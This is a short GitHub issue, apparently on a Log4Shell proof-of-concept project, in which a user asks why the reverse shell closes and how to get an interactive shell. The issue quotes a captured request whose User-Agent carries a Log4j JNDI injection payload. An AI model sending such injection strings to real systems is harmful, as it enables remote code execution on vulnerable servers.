Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Reverse Shell keeps closing #6

Open
DennisFeldbusch opened this issue Dec 20, 2022 · 0 comments
Open

Reverse Shell keeps closing #6

DennisFeldbusch opened this issue Dec 20, 2022 · 0 comments

Comments

@DennisFeldbusch
Copy link

When I send a request with curl I get the same connection and output like the README tells, but it seems like I can't send commands. It just prints all I write and enter doesn't seem to send the commands to the server.

When I try it with the pwn.py script I get a connection from the server in my netcat like the following:

Connection from 192.168.178.80:55100
GET / HTTP/1.1
Host: 192.168.178.80:4040
User-Agent: ${jndi:ldap://127.0.0.1:8888/${java:version}}
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

but whenever I hit enter this connection closes.

How do I get a interactive shell?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant